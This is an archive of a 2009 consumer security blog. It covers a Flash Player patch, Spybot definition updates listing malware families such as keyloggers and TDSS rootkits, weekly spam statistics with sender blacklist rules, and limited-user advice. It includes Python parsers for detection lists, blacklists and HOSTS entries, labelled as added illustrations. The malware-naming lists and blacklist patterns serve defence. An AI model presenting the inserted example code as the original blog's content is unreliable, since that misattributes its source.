February 27, 2009

Adobe patches critical vulnerabilities in Flash Player

Adobe Flash Player (formerly Macromedia Flash) is a browser plug-in/add-on module that displays active "Flash" multimedia content in web pages. This active content can include audio, video, hyperlinks, and JavaScript. It is thought that Flash Player is installed in over 90% of the personal computers that connect to the Internet. For instance, if you watch YouTube videos on your PC you are doing so via a Flash Player plug-in. Got the picture? So do the bad guys, who are always looking for ways to hijack your PC through Flash vulnerabilities! Some of these vulnerabilities include the ability to forcefully redirect a browser to a hostile file location and download it without the user's knowledge, then execute it. This is currently being exploited by means of specially crafted Flash advertisements made by cyber criminals.

On February 24, 2009, Adobe Flash Player was patched to fix 5 critical vulnerabilities that could allow complete system takeover, without user interaction. This time it not only affects Windows computers, but also Mac OS X and Linux PCs. The new, patched version of Adobe Flash Player is 10.0.22.87. This patch must also be installed into the Adobe CS 4 Flash creation program, if you are a Flash content developer.

Here is a summary of the security advisory published on February 24, 2009...

Adobe Security Advisory APSB09-01

"A potential vulnerability has been identified in Adobe Flash Player 10.0.12.36 and earlier that could allow an attacker who successfully exploits this potential vulnerability to take control of the affected system. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit this potential vulnerability. Additional vulnerabilities have been addressed in this update. Adobe recommends users update to the most current version of Flash Player available for their platform."

Affected software versions:
Adobe Flash Player 10.0.12.36 and earlier (Adobe Flash Player 10.0.15.3 and earlier for Linux).

Adobe recommends all users of Adobe Flash Player 10.0.12.36 and earlier versions upgrade to the newest version 10.0.22.87 by downloading it from the Player Download Center, or by using the auto-update mechanism within the product when prompted. Only download the Flash Player and its updates from adobe.com! Cyber criminals try to fool people into installing fake Flash players as a means of distributing Botnet Trojans and fake anti-virus products.

For users who cannot update to Flash Player 10, Adobe has developed a patched version of Flash Player 9, Flash Player 9.0.159.0, which you can download from this link.

If you use more than one browser you must install the update in each browser separately, by visiting the above-listed download page, as different browsers need different types of Flash. For instance, Internet Explorer uses an ActiveX version of Flash Player, while Firefox, Opera and others use a browser plug-in version. After you install the update you must restart your browser for the update to "take." This flushes out the previous version and registers the new one.

After restarting your browser you should go to the About Flash Player page to ensure that you now have the current version installed. I also recommend that you use the Secunia Online Software Inspector scanner to make sure all of your browser's add-ons are up to date, as well as your operating system patches.

I would like to close by stating that users who operate their computers with less than administrator privileges are less at risk from these browser plug-in exploits. Read my recent article about how running your PC with reduced user privileges stops up to 92% of malware infections and its related, linked-to articles.


February 25, 2009

Spybot Search and Destroy Definitions Updated on 2/25/2009

Hey, you! If you use Spybot Search and Destroy to protect your computer against spyware, it is time to run your manual updates. New definitions and false positive fixes are usually released every Wednesday. Today's updates were released on schedule and are listed below.

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (for Windows PCs) is:

  • Go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open.

  • Leave the default options as they are, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates.

  • Select a location nearest to you from the list and click on "Continue."

  • Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct, the check marks will disappear from the check boxes and be replaced with green arrow graphics.

  • Sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers.

When all updates have succeeded, click on "Exit." With the program updated it is time to open the main program interface, using either the Start Menu link or a desktop icon, to launch Spybot Search and Destroy. The next item to take care of is to apply Immunization. Click on the Immunize button in the left sidebar, select everything you want, or uncheck things like cookies, Hosts, or Domains, as you see fit, then click on the Immunize button (the one with a green cross) above the right panel. After immunizing against unwanted items you should click on the Search & Destroy icon, on the left, then click "Check for problems," on the right side.

It will take several minutes, or longer, to scan all your files for known threats and for possible threats using heuristics, unless you disable heuristics in the program's main Advanced Mode > Settings. When the scan completes, anything matching the definition databases will be listed in the results window, with check boxes in front of each main item group. If you find the program has listed some cookies or other programs you use and trust, uncheck them, then right-click on the item name and select "Exclude this product from further searches." Finally, click on "Fix (selected) Problems."

Spybot Search and Destroy 1.6.2 was released on January 26, 2009. This is probably going to be the last "maintenance release" before version 2.0 is released. It scans for threats about 4 times faster than previous versions and has a redesigned spyware removal engine. Upgrade now to Spybot S&D 1.6.2. The newest Virtumonde and Zlob threats require the anti-malware engine in Spybot 1.6+ to effectively remove them.

Additions made on February 25, 2009:

Keyloggers
+ PerfectKeylogger

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ Fraud.MSAntispyware2009
+ Win32.TDSS.cls
+ Win32.TDSS.rtk

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ MyRegistryCleaner
+ OriginalSolitaire

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ BraveSentry
+ InternetAntivirusPro
+ Virtumonde.atr
+ Virtumonde.prx
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.Agent.ark
+ Win32.Agent.fbx
+ Win32.Agent.sd
+ Win32.Anel
+ Win32.Delf.axb
+ Win32.TDSS.alt
+ Win32.TDSS.clt
+ Win32.TDSS.eit
+ Win32.TDSS.flt
+ Win32.TDSS.rtk
+ Win32.TDSS.vlt
+ Win32.VB.qq

Total: 1406313 fingerprints in 444173 rules for 4561 products.

False positive detections reported or fixed this week:

Confirmed false positive detection of "Brontok.Ab" in a user's desktop ini file. This was fixed with today's updates.

A confirmed false detection of Virtumonde in C:\windows\system32\zipfdr.dll is due to users running older versions of Spybot S&D. Please upgrade to the current version, 1.6.2, download the newest definitions and F/F updates, then scan your system. These false positives should be gone (unless you really are infected!).

Oh boy! Here we go; get on your hard hats!

Spybot S&D is now flagging installations of McAfee and Trend Micro security software as "PUPs," or Potentially Unwanted Programs (see this forum thread). This was done in retaliation against those companies for requiring their customers to uninstall Spybot while installing their products. Team Spybot has tested its program with both of these security suites, and others, and finds no evidence of any incompatibilities or struggles between them.

If you have purchased McAfee or Trend Micro security suites (which are very good products) and they ask you to uninstall Spybot, or do so without your option to refuse, simply reinstall Spybot afterward. But, I recommend not activating the Tea Timer module in Spybot S&D, as this will cause a struggle over which program monitors the system for realtime changes.



Read my extended comments for more details about using Spybot S&D and for program development announcements.

Extended Comments

If you arrived here by searching for the name of some malware that may be on your computer and you are not currently using Spybot Search and Destroy, you can download the latest version from the Spybot Search and Destroy Multi-Lingual Landing Page. Choose your language, then use the link in the left sidebar to go to the downloads page. Download the program from your closest mirror server, install it, update it (Updates button), then follow the instructions below to detect and remove any malware that is on your PC. If Spybot is unable to remove an active threat it will ask for permission to run before Windows starts during the next reboot. Spybot will then run a complete scan before your Windows desktop loads, removing malware that has not yet loaded into memory.

If you see a program listed in the new detections, by its name, you should assume that it is malware (with the possible exception of the PUP group, which is up to user discretion). All of the programs listed with a single + sign are updated detections, while a double ++ in front of its name indicates a brand new detection. A number in parentheses, following a malware name, indicates the number of variants included in that detection. These programs are dangerous to your computer, and/or personal security or privacy.
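The notation just described (one + for an updated detection, ++ for a brand new one, and a count in parentheses for the number of variants) is simple enough to parse mechanically. The following Python script is an added example, not code from this blog or from Team Spybot: it reads a list in the format of the weekly "Additions made on ..." posts and turns it into records you can total up. The sample list is constructed; the "Example.NewFamily (3)" entry is made up to show the ++ and (n) notation, and the category names are taken from the post.

```python
import re

# One entry line: "+" or "++", the product name, optionally " (n)" variants.
ENTRY = re.compile(r"^(\+{1,2})\s+(.+?)(?:\s+\((\d+)\))?\s*$")


def parse_additions(text):
    """Parse a weekly 'Additions made on ...' list into records.

    Lines that do not start with '+' are category headings. The explanatory
    text the post puts in parentheses after a heading ("Trojans (Trojans come
    to you...)") is dropped so the category is just "Trojans".
    """
    records = []
    category = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ENTRY.match(line)
        if m is None:
            category = line.split(" (", 1)[0].strip()
            continue
        marker, name, variants = m.groups()
        records.append({
            "category": category,
            "name": name,                     # "(Botnet)" style notes stay in the name
            "new": marker == "++",            # "++" = brand new detection
            "variants": int(variants) if variants else 1,
        })
    return records


def summarize(records):
    """Totals a reader would want: new vs. updated detections, variants, per category."""
    by_category = {}
    for r in records:
        by_category[r["category"]] = by_category.get(r["category"], 0) + 1
    return {
        "new": sum(1 for r in records if r["new"]),
        "updated": sum(1 for r in records if not r["new"]),
        "variants": sum(r["variants"] for r in records),
        "by_category": by_category,
    }


# Constructed sample in the post's list format (not a real weekly update).
SAMPLE_LIST = """\
Keyloggers
+ PerfectKeylogger

Trojans (Trojans come to you disguised as something useful, or as a missing codec.)
++ Example.NewFamily (3)
+ Win32.Asprox (Botnet)
+ Win32.TDSS.rtk
"""

if __name__ == "__main__":
    recs = parse_additions(SAMPLE_LIST)
    for rec in recs:
        print(rec)
    print(summarize(recs))
```

Running it on the sample prints four records (one of them flagged new, with three variants) and a summary of 1 new and 3 updated detections across the Keyloggers and Trojans categories.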

The domains "Spywareinfo.com" and TrafficZ were recently added to the HOSTS file updates (for redirection to 127.0.0.1), because the domain name expired and was purchased by spammers or malware distributors in December 2008. It is now advertising a fake Spybot Search & Destroy, fake security scans and various malware downloads. The new Spywareinfo malware removal forum is located at: http://www.spywareinfoforum.com/

Note for Firefox users who saved links to the old spywareinfo website:
It has recently (Feb/09) been reported that in some versions of Spybot S&D, on some operating systems, if you have a link to the old spywareinfo website, now owned by purveyors of fake anti-spyware products and scanners, "fixing" it will erase your entire Bookmarks.html file. This is being looked into right now and hopefully will be fixed very soon. In the meantime, if you use Firefox as your browser (which stores Favorite places as "Bookmarks") and after running a scan Spybot lists an infected bookmark with Spywareinfo as the culprit, uncheck that entry before fixing any other problems. You can manually edit your Firefox Bookmarks to remove the link to that website, or any similar compromised website.

Malware Removal Guides

The good folks at Spybot S&D have started a new segment of their official forums, titled "Malware Removal Guides." Each week they intend to write a short self-help article to help you remove various common malware threats manually, or in conjunction with Spybot S&D. This should prove to be a very useful addition to the Spybot forums.

If you are still using Spybot S&D 1.3 or 1.4, update support is about to end and your computer will be at greater risk because of having outdated definitions. Furthermore, older versions of Spybot are known to report lots of false positives, due to the advanced heuristic rules now found in the newer definition files.

If you are using any version older than 1.6 please upgrade to the current version of Spybot S&D, which is now 1.6.2, as soon as possible. New definitions for malware like the Virtumonde family of Trojans need the newer processing technologies introduced in version 1.6.0. Also, the number of malware definitions has more than doubled between July and December, 2008.

Work is progressing at a steady pace on Spybot S&D version 2.0, thanks to an army of volunteer beta testers. The upcoming version will be modularized, with separate executables carrying out different detection and immunization tasks now performed by the main program file. This is expected to speed up the scanning times, which is becoming more strenuous with the rapid increase in the number of detections being developed by Team Spybot.

To benefit from these improvements, I recommend that you update to Spybot Search & Destroy 1.6.2, which is available through the update function integrated into the application as well as from the Spybot S&D download page. When version 2.0 is finally released you should follow the to-be-posted instructions and upgrade to that version.

If your computer gets stuck in a logon/logoff loop, after updating and scanning with the older versions of Spybot, visit this forum page for a solution, from Team Spybot.

Of continued concern to people who operate as Limited or Power Users for their daily browsing and email, Spybot Search and Destroy is still corrupting your less privileged accounts after you update it, immunize and scan from an Administrator level account. If, after doing these things, you log off the Administrator account and try to log into your Limited/Power User account, it may be corrupted and a generic desktop and start menu may appear. Don't panic! Your account and desktop can be restored by simply rebooting the computer. When you login after the reboot your previous settings will reappear. I don't know why this happens, but, stuff happens! It may be related to the relatively new rootkit detection added last year.

If you want to get direct assistance from Team Spybot, or their talented volunteers, visit the Spybot support forums, sign up for a user account and post your request for assistance. Be sure to read the rules before posting a question or reply.

If your computer is infected and you need help removing the threats, go to the Malware Removal Forums, at Safer Networking/Spybot.info. Again, read the rules before posting your request or logs! Do NOT inject your problem into somebody else's thread! Start a new topic.

Some people are confused by detections of Wild Tangent on their computers. Wild Tangent is detected as a PUP, meaning Potentially Unwanted Program, because it does send home some identifiable information about you and your computer. It ships with various games and screen savers and is a means of funding those programs. If you knowingly installed Wild Tangent and aren't worried about it, and don't wish to have Spybot repeatedly display it in scan results, do the following: Right click the WildTangent Product in the Scan result and select to "Ignore the product from further searches."

If Spybot flags a file on your computer that you believe is a false positive detection, use caution and check with the Spybot False Positives Forum before allowing it to be deleted. You can submit a report to the Spybot False Positives forum, after signing up for an account and reading about how to report false positives before submitting your report and request for analysis.


February 22, 2009

My Spam analysis for Feb 16 - 22, 2009

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

Spam is still way down from last fall, thanks to the efforts of researchers in the security field. Starting with the takedown of the colocation facility McColo, on November 11, 2008, levels of incoming messages MailWasher identified as spam have dropped dramatically. That company provided hosting space and maintenance for privately owned servers that were used by spammers to command and control spam-sending Botnets. Those spammers are rebuilding or replacing their Botnets as I type this, so let's not become complacent. In fact, my spam count has been slowly increasing since the third week of January, 2009.

If you use MailWasher Pro you can enable the Blacklist function and add some pattern-matching blacklist filters to automatically delete spam messages containing a forged From address matching either of these Regular Expressions: lin+met@+.de and kef+diz@+. These two blacklist rules caught over 22% of this week's spam.
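To show what those two blacklist rules actually match (and do not match), here is an added Python example; it is not code from this blog or from MailWasher Pro. It assumes that a "+" in a rule stands for any run of one or more characters and that everything else in the rule is literal, which is how "lin+met@+.de" reads in the post; MailWasher's own matching engine may differ. The From addresses it is run against are constructed, not real senders.

```python
import re

# The two wildcard blacklist rules quoted in the post.
# Assumption (mine, not MailWasher Pro's documented behaviour): a "+" in a
# rule stands for any run of one or more characters, and everything else is
# literal, so "lin+met@+.de" means "lin<anything>met@<anything>.de".
BLACKLIST_RULES = ["lin+met@+.de", "kef+diz@+"]


def wildcard_to_regex(rule):
    """Convert a '+'-wildcard rule to an anchored, case-insensitive regex.

    Each literal fragment is escaped, so the '.' in '.de' matches only a dot
    and the rule cannot accidentally match something like 'examplexde'.
    """
    fragments = [re.escape(part) for part in rule.split("+")]
    return re.compile("^" + ".+".join(fragments) + "$", re.IGNORECASE)


# Compile once; the blacklist is checked against every incoming message.
COMPILED_RULES = [(rule, wildcard_to_regex(rule)) for rule in BLACKLIST_RULES]


def matching_rule(from_addr):
    """Return the first blacklist rule matching a From address, else None."""
    for rule, pattern in COMPILED_RULES:
        if pattern.match(from_addr.strip()):
            return rule
    return None


def blacklist_report(from_addrs):
    """Count hits per rule and the share of mail the blacklist would delete,
    the figure the post reports as 'Blacklisted Domains/Senders'."""
    hits = {rule: 0 for rule in BLACKLIST_RULES}
    for addr in from_addrs:
        rule = matching_rule(addr)
        if rule is not None:
            hits[rule] += 1
    total = len(from_addrs)
    caught = sum(hits.values())
    percent = round(100.0 * caught / total, 2) if total else 0.0
    return {"hits": hits, "caught": caught, "total": total, "percent": percent}


# Constructed sample From addresses (not real senders).
SAMPLE_FROM = [
    "lindahammet@example.de",          # matches lin+met@+.de
    "LinDaHamMet@Mailer.Example.DE",   # same rule, mixed case
    "kef.ardiz@example.net",           # matches kef+diz@+
    "linmet@example.de",               # nothing between "lin" and "met": no hit
    "alice@example.com",               # legitimate sender, no hit
]

if __name__ == "__main__":
    for addr in SAMPLE_FROM:
        print(f"{addr:32} -> {matching_rule(addr)}")
    print(blacklist_report(SAMPLE_FROM))
```

The rules are anchored at both ends and the literal parts are escaped, which is the main thing to get right when turning a loose wildcard into a regex: an unanchored or unescaped pattern would quietly widen the blacklist and start deleting legitimate mail.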

MailWasher Pro spam category breakdown for Feb 16 - 22, 2009. Spam amounted to 16% of my incoming email this week. This represents a 6% increase from last week. The Botnets are coming back to life.


Blacklisted Domains/Senders: (by pattern matching wildcard rules like: lin+met@+.de and kef+diz@+) 22.73%
Hidden ISO Subject: 13.64%
Other filters: (See my MWP Filters page) 13.64%
Nigerian 419 Scams: 9.09%
Fake "Canadian Pharmacy" spam (fake Viagra, Cialis, etc): 9.09%
HTML Tricks: (ex: vertical, colored, or right-aligned spam words) 4.55%
Male enhancement spam (subject or body): 4.55%
Misc. Pharmaceutical spam (inc. Viagra, Cialis, Levitra & misc. pills & herbals): 4.55%
Numeric IP to Trojan download: 4.55%
Joe Job Bounces: 4.55%
PayPal Scams: 4.55%
Google Redirect to spam site: 4.55%

If you are reading this and wondering what you can do to reduce the sometimes huge volumes of spam emails that must be overwhelming your POP client inboxes, I recommend MailWasher Pro (with my downloadable custom filters) as an incoming email screener for your POP email program (Microsoft Outlook, Microsoft Outlook Express, Microsoft Live Mail, Eudora, Mozilla and other stand-alone email programs).

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or, if they made it through, were reported to SpamCop, of which I am a reporting member, and manually deleted. I never buy anything that is Spamvertised and recommend you don't either! Remember, almost all spam is now sent from compromised home or business PCs, zombies in various Botnets, all of which are controlled by criminals. If you purchase anything advertised in spam messages, you have given your credit or debit card information to the criminals behind that enterprise. If you are really lucky you will only be charged for the fake items you purchased, but, if not, you might find your credit limit used up, or your bank account emptied (for debit card transactions), by cyber criminals.

Also, unsubscribing through links in botnet-sent spam messages is futile, as you never opted-in, in the first place; your email address was captured by an email harvester on an infected computer belonging to somebody you corresponded with. Instead of receiving less spam as one might expect (by unsubscribing), all it does is confirm that your email address is active and you will see even more spam than before.

Another common way your email address may get harvested by spammers is if it appears in a large C.C. (Carbon Copy) list on a computer that gets Botnetted. Many people engage in forwarding messages among all their friends. Each time they forward chain letters their address gets added to the growing list of recipients (called Carbon Copy, or CC). If just one recipient of that message has an email harvesting malware infection, all of the email addresses listed in that message will be sent home to the spammer behind that spam run.

Smart folks who want to forward or send a message to multiple recipients use B.C.C. instead of C.C. Using B.C.C. hides all of the recipients from displaying. The To field will just show "Undisclosed Recipients" in a message sent using B.C.C. This is safest for you and your friends or mailing list. All email clients have a means of displaying a B.C.C. field.


February 18, 2009

Running a PC with reduced user privileges stops 92% of malware

According to a recent study by the BeyondTrust Corporation, titled "92 Percent of Critical Microsoft Vulnerabilities are Mitigated by Eliminating Admin Rights," most known and as yet unknown Windows exploit attacks will fail if the targeted PC is being operated with reduced user privileges. This means not running as an Administrator.

BeyondTrust's findings show that among the 2008 Microsoft vulnerabilities given a "critical" severity rating, 92 percent shared the same best practice advice from Microsoft to mitigate the vulnerability: "Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights." This language, found in the "Mitigating Factors" portion of Microsoft's security bulletins, also appears as a recommendation for reducing the threat from nearly 70 percent of all vulnerabilities reported in 2008.

Since as far back as May 2007 I have been publishing blog articles professing the added security to be gained by operating a PC with reduced user privileges. Furthermore, I published a web page titled: User Account Privileges Explained, describing the differences between the various types of user accounts available in Windows 2000 and XP. That page also contains instructions for elevating reduced user privileges by using the Windows "Run as" right-click option, when installing or launching a program that was built with the assumption that a member of the Administrators Group would be running it.

Some of the benefits derived by reducing your user privileges for your daily browsing account may include the following:


  • Most viruses cannot be installed

  • Most spyware cannot be installed

  • Most adware cannot be installed or survive a reboot

  • Browser BHOs that hijack your home page and search may not be fully installed, or survive a reboot

  • Rootkits cannot be installed

  • Mistakes you make by visiting compromised websites will probably fail to cause any damage

  • Botnet executables cannot take control of your computer

  • Fake anti virus or anti spyware popup alerts will not be installed, or survive a reboot

  • System Restore, Windows Defender, the Windows Firewall and Automatic Windows Updates cannot be disabled

  • Your HOSTS file cannot be poisoned

  • Worms, like the Conficker Worm cannot be installed, even via AutoPlay/AutoRun exploits

  • Changes cannot be made to the HKLM branch of the Windows Registry

  • Some programs cannot be installed, unless you use "Run as"

  • Files cannot be saved to, deleted from, or overwritten with fake copies, in the Windows and System32 directories and sub-directories


To achieve all of the above protection one should change their daily browsing account type from "Computer Administrator" to "User" or "Limited User." If you are using a computer with a "Business" or "Professional" version of Windows you can run as a "Standard User" (Windows Vista and Windows 7), or "Power User" (Windows 2000 and XP), depending on your operating system. The benefits also presume that the owner or user is not tricked into installing the malware by using the "Run as (Administrator)" command. If you download a Trojan Horse program that you think is something useful and it turns out to be malware in disguise, you can infect the computer by Running it as an/the Administrator. Common sense and a high level of suspicion, along with a judicious amount of Googling about unrecognized programs, before installing them, can save your butt.

In the security business this is known by the pet name of "practicing safe hex!" If you are now operating your Windows 2000, XP, Vista, or Windows 7 PC as an/the Administrator, stop doing it now. Create a new Administrator level account, give it a good strong password, log out of your current account and into the new Administrator level account. This sets it up in the operating system and gives it a basic desktop setup. While you are logged into the new Administrator account go to Control Panel > Users and Passwords (whatever) and open your previous account name for editing. Change the old account "type" from "(Computer) Administrator" to "User," "Standard User," or "Limited User," depending on which OS you are using. When you next log into that account it will have all of the same settings, My Documents, Bookmarks/Favorites, email, preferences, etc, but will not be a member of the "Administrators Group." The account will be among the 92% that could be protected from malware attacks purely by virtue of having reduced user privileges. In reality, you will be in the minority, until more people learn to run without Administrator privileges.

If you are running Windows 2000 or XP Professional, Vista Business, or Windows 7, you can elevate a limited user account to a Power User or Standard User account by performing the following steps from an Administrator level account:

  • Right-click on the (My) Computer icon and select "Manage."

  • Under Computer Management, click on the + next to Local Users and Groups to expand it.

  • Click on "Groups" to display all available user groups for your computer. If you see Power User, or Standard User (and Backup Operators), on the right side, you can elevate a limited account to that level.

  • Click on Users to open a list of users in the right pane. Find the account you wish to change on the right and double-click on it.

  • Click on the "Member Of" tab and review the group(s) it belongs to. If it shows User, or Limited User, then click on the "Add" button at the bottom.

  • Type the name of the user group you wish to add, then click on the "Check Names" button. It will fill in the necessary details about that group, or allow you to edit the group name until you get one right.

  • When the new group membership is correctly listed, click OK. Click Apply, then OK, to close the dialog boxes, then close the Computer Management Console.

You can also open the Computer Management Console by copying and pasting this command into your "Run" box: compmgmt.msc


Spybot Search and Destroy Definitions Updated on 2/18/2009


Additions made on February 18, 2009:

Keyloggers
+ PerfectKeylogger

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ AdDestination
+ Smitfraud-C.
+ Win32.Bomka.r
+ Win32.Constructor.DOS.Vkit
+ Win32.Flooder


Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ Virtumonde
+ Virtumonde.prx
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.Agent.fox
+ Win32.Agent.frl
+ Win32.Agent.ju
+ Win32.Asprox (Botnet)
+ Win32.TDSS.rtk
+ Win32.VB.qu
+ Zlob.Downloader.suo
+ Zlob.Downloader.vet
+ Zlob.Downloader.vot
+ Zlob.VideoCompressionCodec

Total: 1343105 fingerprints in 384000 rules for 4559 products.

False positive detections reported or fixed this week:

Nothing new to report at this time, except that after ongoing dialogs, SpywareCease still remains classified as malware, by Spybot S&D. This may change in the future, but for now that program is treated as unwanted software.

Read my extended comments for more details about using Spybot S&D and for program development announcements.

Extended Comments

If you arrived here by searching for the name of some malware that may be on your computer and you are not currently using Spybot Search and Destroy, you can download the latest version from the Spybot Search and Destroy Multi-Lingual Landing Page. Choose your language, then use the link in the left sidebar to go to the downloads page. Download the program from your closest mirror server, install it, update it (Updates button), then follow the instructions below to detect and remove any malware that is on your PC. If Spybot is unable to remove an active threat it will ask for permission to run before Windows starts during the next reboot. Spybot will then run a complete scan before your Windows desktop loads, removing malware that has not yet loaded into memory.

If you see a program listed in the new detections, by its name, you should assume that it is malware (with the possible exception of the PUP group, which is up to user discretion). All of the programs listed with a single + sign are updated detections, while a double ++ in front of a name indicates a brand new detection. A number in parentheses, following a malware name, indicates the number of variants included in that detection. These programs are dangerous to your computer, and/or personal security or privacy.

The domains "Spywareinfo.com" and TrafficZ were recently added to the HOSTS file updates (for redirection to 127.0.0.1), because the Spywareinfo.com domain name expired and was purchased by spammers or malware distributors in December 2008. It now advertises a fake Spybot Search & Destroy, fake security scans and various malware downloads. The new Spywareinfo malware removal forum is located at: http://www.spywareinfoforum.com/
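As an added illustration of what a HOSTS file redirection like this actually does (example code written for this page, not the blog author's code and not Spybot's own immunization routine), the Python below parses a few constructed HOSTS lines in the style the immunization writes and checks which names they sinkhole. The sample entries, the trafficz.com spelling and the 0.0.0.0 lines are assumptions for the demonstration. The practical point it shows: a HOSTS file has no wildcards, so an entry for spywareinfo.com says nothing about www.spywareinfo.com, and every host name that should be blocked has to be listed on its own.

```python
import ipaddress

# Constructed sample of HOSTS file content in the style Spybot's immunization
# writes (the real list is far longer). "trafficz.com" is an assumed spelling
# of the second domain named in the text; the 0.0.0.0 entries are made up.
SAMPLE_HOSTS = """\
# Start of entries inserted by Spybot - Search & Destroy
127.0.0.1 spywareinfo.com
127.0.0.1 trafficz.com   # trailing comment
0.0.0.0   ads.example.net tracker.example.net
# End of entries inserted by Spybot - Search & Destroy
"""

def parse_hosts(text):
    """Return {hostname: ip} for every hostname in a HOSTS file.

    Handles '#' comments, blank lines and several hostnames on one line.
    Hostnames are lower-cased because the resolver matches them case-insensitively.
    """
    table = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line: skip rather than guess
        for host in fields[1:]:
            table[host.lower()] = str(ip)
    return table

def is_sinkholed(table, hostname):
    """True if the HOSTS file pins hostname to a loopback or unspecified address."""
    ip = table.get(hostname.lower().rstrip("."))
    if ip is None:
        return False
    addr = ipaddress.ip_address(ip)
    return addr.is_loopback or addr.is_unspecified

def unblocked_subdomains(table, hostname, candidates=("www",)):
    """Sub-names that still resolve normally: HOSTS entries never match wildcards."""
    return [f"{label}.{hostname}" for label in candidates
            if not is_sinkholed(table, f"{label}.{hostname}")]

if __name__ == "__main__":
    hosts = parse_hosts(SAMPLE_HOSTS)
    for name in ("spywareinfo.com", "www.spywareinfo.com", "TrafficZ.com"):
        print(f"{name:24} blocked={is_sinkholed(hosts, name)}")
    print("still reachable:", unblocked_subdomains(hosts, "spywareinfo.com"))
```

Run it and you will see spywareinfo.com blocked but www.spywareinfo.com untouched; a browser that tries the www form goes straight to the real (now hostile) site.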

Note for Firefox users who saved links to the old spywareinfo website:
It has recently (Feb/09) been reported that in some versions of Spybot S&D, on some operating systems, if you have a bookmark to the old spywareinfo website, now owned by purveyors of fake anti-spyware products and scanners, "fixing" it will erase your entire Bookmarks.html file. This is being looked into right now and hopefully will be fixed soon. In the meantime, if you use Firefox as your browser (which stores Favorite places as "Bookmarks") and, after running a scan, Spybot lists an infected bookmark with Spywareinfo as the culprit, uncheck that entry before fixing any other problems. You can manually edit your Firefox Bookmarks to remove the link to that website, or to any similar compromised website.

Malware Removal Guides

The good folks at Spybot S&D have started a new segment of their official forums, titled "Malware Removal Guides." Each week they intend to write a short self-help article to help you remove various common malware threats manually, or in conjunction with Spybot S&D. This should prove to be a very useful addition to the Spybot forums.

If you are still using Spybot S&D 1.3 or 1.4, update support is about to end and your computer will be at greater risk because of outdated definitions. Furthermore, older versions of Spybot are known to report lots of false positives, because they cannot correctly process the advanced heuristic rules now found in the newer definition files.

If you are using any version older than 1.6 please upgrade to the current version of Spybot S&D, which is now 1.6.2, as soon as possible. New definitions for malware like the Virtumonde family of Trojans need the newer processing technologies introduced in version 1.6.0. Also, the number of malware definitions has more than doubled between July and December, 2008.

Work is progressing at a steady pace on Spybot S&D version 2.0, thanks to an army of volunteer beta testers. The upcoming version will be modularized, with separate executables carrying out the different detection and immunization tasks now performed by the main program file. This is expected to speed up scanning, which is taking longer as the number of detections developed by Team Spybot grows rapidly.

To benefit from these improvements, I recommend that you update to Spybot Search & Destroy 1.6.2, which is available through the update function integrated into the application as well as from the Spybot S&D download page. When version 2.0 is finally released you should follow the to-be-posted instructions and upgrade to that version.

If your computer gets stuck in a logon/logoff loop, after updating and scanning with the older versions of Spybot, visit this forum page for a solution, from Team Spybot.

Of continued concern to people who operate as Limited or Power Users for their daily browsing and email: Spybot Search and Destroy is still corrupting less privileged accounts after you update it, immunize and scan from an Administrator level account. If, after doing these things, you log off the Administrator account and try to log into your Limited/Power User account, it may be corrupted and a generic desktop and start menu may appear. Don't panic! Your account and desktop can be restored by simply rebooting the computer. When you log in after the reboot your previous settings will reappear. I don't know why this happens, but, stuff happens! It may be related to the relatively new rootkit detection added last year.

If you want to get direct assistance from Team Spybot, or their talented volunteers, visit the Spybot support forums, sign up for a user account and post your request for assistance. Be sure to read the rules before posting a question or reply.

If your computer is infected and you need help removing the threats, go to the Malware Removal Forums, at Safer Networking/Spybot.info. Again, read the rules before posting your request or logs! Do NOT inject your problem into somebody else's thread! Start a new topic.

Some people are confused by detections of Wild Tangent on their computers. Wild Tangent is detected as a PUP, meaning Potentially Unwanted Program, because it does send home some identifiable information about you and your computer. It ships with various games and screen savers and is a means of funding those programs. If you knowingly installed Wild Tangent and aren't worried about it, and don't wish to have Spybot repeatedly display it in scan results, do the following: Right click the WildTangent Product in the Scan result and select to "Ignore the product from further searches."

If Spybot flags a file on your computer that you believe is a false positive detection, use caution and check with the Spybot False Positives Forum before allowing it to be deleted. You can submit a report to the Spybot False Positives forum, after signing up for an account and reading about how to report false positives before submitting your report and request for analysis.

February 15, 2009

My Spam analysis for Feb 9 - 15, 2009

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

